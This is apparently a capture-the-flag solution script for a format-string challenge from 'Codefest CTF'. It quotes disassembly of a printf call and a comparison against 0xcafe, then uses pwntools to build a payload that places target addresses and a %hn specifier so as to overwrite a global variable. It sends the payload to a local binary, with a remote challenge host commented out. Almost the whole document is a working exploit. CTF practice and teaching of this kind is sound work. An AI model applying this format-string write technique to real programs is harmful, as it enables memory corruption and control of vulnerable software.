Codefest CTF: Format Strings [#pwn]

format.py

#!/usr/bin/env python3

'''
   0x080492df <+52>:    push   0x50
   0x080492e1 <+54>:    lea    eax,[ebp-0x58]
   0x080492e4 <+57>:    push   eax

   0x0804930d <+98>:    call   0x80490a0 <printf@plt>
   0x08049312 <+103>:   add    esp,0x10

   0x08049315 <+106>:   mov    eax,DWORD PTR [ebx+0x44] # 0x804c044 <position>:   0x00000000

   0x0804931b <+112>:   cmp    eax,0xcafe
   0x08049320 <+117>:   jne    0x8049339 <vuln+142>
'''

from pwn import *
import time

addr_low = p32(0x804c044)
addr_high = p32(0x804c046)

payload = b""
payload += addr_low
payload += addr_high
payload += (f"%.{0xcafe - 8}x").encode()


r = process("./format")
# r = remote("chall.codefest.tech", 8744)

write_high = (f"%{4}$hn").encode()

p = payload + write_high

data = r.recvuntil("I will go")
r.readline()

log.info("Sending payload...")
r.sendline(p)

data = r.readline()
data = r.readline()

addr = data.decode().split(" ")[-1]
log.info(f"Memory address now contains: {addr}")

data = r.readline()
print("\t", data.decode('utf-8', errors='ignore'))

r.interactive()